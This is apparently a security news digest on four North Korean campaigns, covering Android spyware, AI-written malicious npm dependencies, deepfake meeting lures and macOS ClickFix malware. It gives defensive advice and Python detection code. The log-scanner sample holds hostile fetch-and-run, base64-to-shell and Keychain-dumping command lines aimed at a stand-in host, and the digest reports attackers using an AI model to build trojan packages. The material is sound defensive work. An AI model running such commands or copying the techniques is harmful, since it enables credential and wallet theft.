Last updated: May 13, 2026 at 5:42 AM UTC
Tag: dprk (4 articles)

North Korean hackers built a fake Korean game platform to spread Android spyware targeting ethnic Koreans living in China

ScarCruft (also called APT37 or Reaper) built a fake online gaming platform in Korean to spread BirdCall, a previously undocumented Android malware aimed at ethnic Koreans living in China. The Record reports the platform impersonated legitimate Korean-language game communities. BirdCall harvests device information, contacts, SMS, call logs, photos, and microphone audio - capabilities consistent with surveillance of diaspora communities rather than financial gain. ScarCruft has historically targeted North Korean defectors and journalists with similar Android malware lures.

Check
If your organization works with Korean-language communities or journalists covering North Korea, check Android devices for unfamiliar Korean game apps installed since early 2026. Review app permissions for SMS, contacts, and microphone access.
Affected
Android users in ethnic Korean communities in China, North Korean defectors, journalists covering North Korea, human-rights organizations, and South Korean policy researchers. Diaspora communities are the primary target. Organizations supporting diaspora communities or refugee networks face downstream risk through their constituents.
Fix
On managed Android devices: enforce Google Play Protect, block sideloading of APKs from unknown sources, and require MDM approval for any Korean-language gaming app. For at-risk individuals: reset Android devices that may have installed the fake platform, and use only verified Google Play apps. Follow Citizen Lab guidance for journalists working on North Korea topics.

North Korean hackers used Claude AI to add malicious npm dependencies to legitimate-looking projects and stole crypto wallet credentials from developers who installed them

North Korea's Famous Chollima group (also called Void Dokkaebi) is using Anthropic's Claude Opus to write malicious npm packages and slip them into developer environments. ReversingLabs found the group had registered a fake Florida LLC, set up a real-looking developer firm, and used Claude to add a package called @validate-sdk/v2 as a dependency to a legitimate-looking utility SDK. When developers installed the parent package, the dependency executed code that stole their cryptocurrency wallet credentials. The campaign progressed from simple JavaScript info-stealers (5KB) to full Node.js executables (85MB) bundling Claude-generated deception code.

Check
If your organization handles cryptocurrency, treat every npm or PyPI dependency as untrusted by default - particularly utility SDKs offered by unfamiliar publishers.
Affected
Cryptocurrency companies and developers, especially those whose machines hold wallet credentials, signing keys, or CI/CD access to crypto infrastructure. Web3 startups, blockchain developers, fintech engineers. The targeting is industry-specific, but the technique (AI-generated trojan dependencies inside legitimate-looking SDKs) will be copied by other groups.
Fix
Pin npm and PyPI dependencies to specific commit SHAs and require manual review for any new dependency added to a crypto-handling project. For high-risk developers, use ephemeral build environments that don't carry wallet credentials. Block ipfs-url-validator.vercel[.]app and the @validate-sdk publisher namespace. Treat any 'utility SDK' from an unfamiliar US LLC formed in the past 12 months with extra suspicion.
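
The two controls in the Fix section (commit-SHA pinning and manual review of any newly added dependency, plus the publisher-namespace block) can be enforced mechanically in CI. The script below is an added example written for this digest, not ReversingLabs' tooling or anything from the campaign analysis. It assumes a plain package.json manifest; the two manifests it audits are constructed for illustration, and only the @validate-sdk scope comes from the article.

```python
import json
import re

# Publisher scope the article says to block. Assumption: a small set is enough here;
# a real deployment would load this from a maintained denylist.
BLOCKED_SCOPES = {"@validate-sdk"}

# A git-style specifier whose fragment is a full 40-hex commit SHA, which is what
# "pin to a commit SHA" means for npm (github:org/repo#<sha>, git+https://...#<sha>).
# Plain semver ranges and exact versions are deliberately NOT accepted.
COMMIT_PINNED = re.compile(r"^(?:git\+[a-z]+://|github:|gitlab:|bitbucket:)\S+#[0-9a-f]{40}$")

SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def audit_dependencies(package_json: str) -> list:
    """Return (name, finding, specifier) for every dependency that violates policy."""
    pkg = json.loads(package_json)
    findings = []
    for section in SECTIONS:
        for name, spec in pkg.get(section, {}).items():
            scope = name.split("/", 1)[0] if name.startswith("@") else None
            if scope in BLOCKED_SCOPES:
                findings.append((name, "blocked-scope", spec))
            if not COMMIT_PINNED.match(spec):
                findings.append((name, "not-commit-pinned", spec))
    return findings


def new_dependencies(old_package_json: str, new_package_json: str) -> set:
    """Names present in the new manifest but not the old: these need a human reviewer."""
    def names(doc):
        pkg = json.loads(doc)
        return {n for s in SECTIONS for n in pkg.get(s, {})}
    return names(new_package_json) - names(old_package_json)


# Constructed manifests for illustration (not a real project's package.json).
OLD_MANIFEST = json.dumps({
    "name": "wallet-tools",
    "dependencies": {
        "ipfs-helper": "github:example-org/ipfs-helper#0123456789abcdef0123456789abcdef01234567",
    },
})

NEW_MANIFEST = json.dumps({
    "name": "wallet-tools",
    "dependencies": {
        "ipfs-helper": "github:example-org/ipfs-helper#0123456789abcdef0123456789abcdef01234567",
        "@validate-sdk/v2": "^2.1.0",   # blocked scope, and a floating range
        "lodash": "^4.17.21",           # fine publisher, but not commit-pinned
    },
})

if __name__ == "__main__":
    for finding in audit_dependencies(NEW_MANIFEST):
        print("finding:", finding)
    print("needs review:", sorted(new_dependencies(OLD_MANIFEST, NEW_MANIFEST)))
```

Run it as a pre-merge check against the manifest on the base branch and the manifest in the pull request; a non-empty `new_dependencies` set is what gates the merge on a human review, and `audit_dependencies` fails the build outright on a blocked scope or an unpinned specifier.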

North Korean hackers are recording fake Zoom meetings with real crypto executives, then using the footage and AI-generated lookalikes to scam the next target

North Korea's BlueNoroff group has built a self-reinforcing deepfake pipeline that turns each victim into the lure for the next attack. Arctic Wolf documented the pattern: attackers send a Calendly invite that looks like a normal business meeting, then quietly swap the Google Meet link for a typo-squatted Zoom URL. When the target joins, a fake Zoom interface secretly records their webcam feed while a clipboard-injection attack drops malware. The captured footage is mixed with AI-generated lookalikes (built using ChatGPT for synthetic portraits) and recycled into the next attack. Arctic Wolf found 950 files on BlueNoroff's media server. 80% of identified targets are crypto executives.

Check
Brief every executive in your organization that any 'Zoom SDK update' prompt asking them to copy and paste commands into their terminal during a meeting is a North Korean malware drop.
Affected
Cryptocurrency executives, Web3 founders, and CEOs at fintech and blockchain companies - 45% of identified targets are CEOs and founders, 80% are in crypto or adjacent sectors. Anyone whose webcam footage was exfiltrated by BlueNoroff is now appearing as a fake meeting participant targeting their professional network.
Fix
Train executives that any 'SDK update' prompt during a meeting is hostile - real Zoom and Teams never ask users to paste commands into terminals. Verify out-of-band before joining any meeting from an unsolicited Calendly link. Block known BlueNoroff infrastructure (Petrosky Cloud LLC AS400897 and the 80 typosquat domains in Arctic Wolf's IoCs). Consider a dedicated meeting device for high-risk executives.
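
The "verify out-of-band before joining" advice can be backed by a simple link check: is the meeting host actually one of the providers the organisation uses, or a lookalike? This is an added example written for this digest, not Arctic Wolf's tooling and not drawn from their IoC list. The allowlist of providers is an assumption to adapt to your own environment, and every URL below is constructed under reserved example domains rather than a real typosquat from the campaign.

```python
from urllib.parse import urlparse

# Assumption: the meeting providers your organisation actually uses. Exact hosts and
# their subdomains are accepted; everything else is treated as unknown.
ALLOWED_MEETING_DOMAINS = ("zoom.us", "meet.google.com", "teams.microsoft.com")
BRAND_TOKENS = ("zoom", "meet", "teams")


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character lookalikes such as zo0m."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def meeting_host(url: str):
    # urlparse lower-cases the host and strips any port; returns None if unparsable
    return urlparse(url).hostname


def classify_meeting_link(url: str) -> str:
    """'allowed', 'lookalike', 'unknown-host' or 'invalid' for a meeting URL."""
    host = meeting_host(url)
    if not host:
        return "invalid"
    for domain in ALLOWED_MEETING_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return "allowed"
    # Not a recognised provider: does any label try to look like one?
    for label in host.split("."):
        for brand in BRAND_TOKENS:
            if brand in label or _edit_distance(label, brand) <= 1:
                return "lookalike"
    return "unknown-host"


def link_was_swapped(invite_url: str, join_url: str) -> bool:
    """True when the link you are about to join is not on the same host as the invite."""
    return meeting_host(invite_url) != meeting_host(join_url)


if __name__ == "__main__":
    # Constructed sample links (reserved .example domain, not real infrastructure).
    invite = "https://meet.google.com/abc-defg-hij"
    join = "https://zo0m.us.join-call.example/j/123"
    print(classify_meeting_link(invite), classify_meeting_link(join))
    print("swapped:", link_was_swapped(invite, join))
```

The `link_was_swapped` check mirrors the article's pattern directly: the invite the executive accepted pointed at one provider, and the link they are handed at join time points somewhere else. Run the classifier on that final link, and treat anything other than `allowed` as a reason to stop and confirm by phone.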

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.
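
The detection item in the Fix section (log and alert on Terminal launches that fetch and execute remote content, and hunt for Keychain-hammering loops) is concrete enough to show as rules. The scanner below is an added example written for this digest, not ANY.RUN's or Dark Reading's tooling. It assumes a tab-separated process-execution export with a timestamp, user, parent application and command line per record; the log lines are constructed, the URLs point at a reserved example domain, and the rule names are mine.

```python
import re

# Assumption: the interactive terminal apps in your fleet. The article's advice is
# specifically about Terminal launches, so other parents are filtered out by default.
TERMINAL_APPS = {"Terminal", "iTerm2"}

RULES = {
    # curl/wget output piped straight into an interpreter
    "remote-pipe-exec": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(bash|sh|zsh|osascript|python3?|perl)\b"),
    # interpreter fed by command substitution of a download: bash -c "$(curl ...)"
    "remote-subst-exec": re.compile(r"(\$\(|`)\s*(curl|wget)\b"),
    # base64-decoded payload piped into a shell
    "decoded-exec": re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(bash|sh|zsh)\b"),
    # tight loop repeatedly querying the Keychain via the security(1) tool
    "keychain-loop": re.compile(r"while\s+(true|:)\b.*\bsecurity\s+(find|dump)-"),
}

# Constructed sample: "timestamp<TAB>user<TAB>parent app<TAB>command line" records.
# Not real telemetry; updates.example is a reserved name, not campaign infrastructure.
SAMPLE_LOG = """\
2026-05-12T09:01:02Z\talice\tTerminal\tbash -c "$(curl -fsSL https://updates.example/zoom-sdk.sh)"
2026-05-12T09:03:10Z\talice\tTerminal\tcurl -s https://updates.example/fix.sh | bash
2026-05-12T09:05:00Z\talice\tTerminal\tgit pull origin main
2026-05-12T09:06:30Z\tbob\tTerminal\tbrew install jq
2026-05-12T09:08:45Z\tbob\tTerminal\tosascript -e 'do shell script "curl https://updates.example/a | sh"'
2026-05-12T09:09:12Z\tbob\tTerminal\techo aGVsbG8= | base64 -D | sh
2026-05-12T09:10:00Z\tbob\tTerminal\twhile true; do security find-generic-password -ga Chrome; done
2026-05-12T09:11:00Z\tbob\tFinder\tcurl -s https://updates.example/fix.sh | bash
"""


def parse_record(line: str) -> dict:
    ts, user, app, cmd = line.rstrip("\n").split("\t", 3)
    return {"ts": ts, "user": user, "app": app, "cmd": cmd}


def match_rules(cmd: str) -> list:
    """Names of every rule the command line trips, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_log(text: str, terminal_only: bool = True) -> list:
    """Return (timestamp, user, app, [rules]) for each record that should alert."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if terminal_only and rec["app"] not in TERMINAL_APPS:
            continue
        hits = match_rules(rec["cmd"])
        if hits:
            alerts.append((rec["ts"], rec["user"], rec["app"], hits))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Ordinary developer activity (`git pull`, `brew install`) passes cleanly, while each ClickFix-style pattern the article describes is caught by a separate rule, so an analyst can see which behaviour fired. The Finder-parented line is dropped by default to match the article's Terminal-focused advice; pass `terminal_only=False` to alert on every parent.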